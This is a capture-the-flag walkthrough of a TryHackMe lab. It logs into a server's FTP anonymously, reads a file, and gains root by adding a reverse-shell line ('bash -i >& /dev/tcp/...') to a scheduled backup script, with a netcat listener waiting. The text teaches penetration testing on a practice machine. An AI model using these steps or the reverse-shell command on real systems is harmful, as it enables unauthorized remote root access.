Our goal is to recreate a hack an attacker did to the server The Best Festival Company (TBFC). Let’s start off by running Nmap against the IP.
Alright we have an FTP server, with anonymous login allowed. We can login without having to use any accounts! We also have SSH open. Let’s login to the ftp server using the username anonymous and no password.
We can use ls and cd to move around the directories to look for something interesting.
Looking at the directories the only one with data in it is the public directory so let’s take a look in there. Also this is the answer to the first question.
Now we need to answer what script gets executed. Looking at what’s in the public directory you can see the .sh extension which is a shell script. There’s the answer to question 2.
We can run mget shoppinglist.txt in order to download the file to our machine. Now cat out the file to answer question 3.
NOTE: In the screenshot below I opened another terminal to get the snapshot. You can’t cat out a file within the ftp console.
Now we need to modify the script so that we can get a reverse shell. Start a netcat listener on whatever port you want by running nc -nlvp 1337. Now in the script add the line bash -i >& /dev/tcp/10.6.43.108/1337 0>&1. NOTE: The IP address should be your tun0 address from your TryHackMe VPN. Save the script and run mput backup.sh within the FTP terminal.
After a few seconds we get a root shell on the tbfc-ftp-01 server!!! Cat out root.txt and submit the final answer for question 4.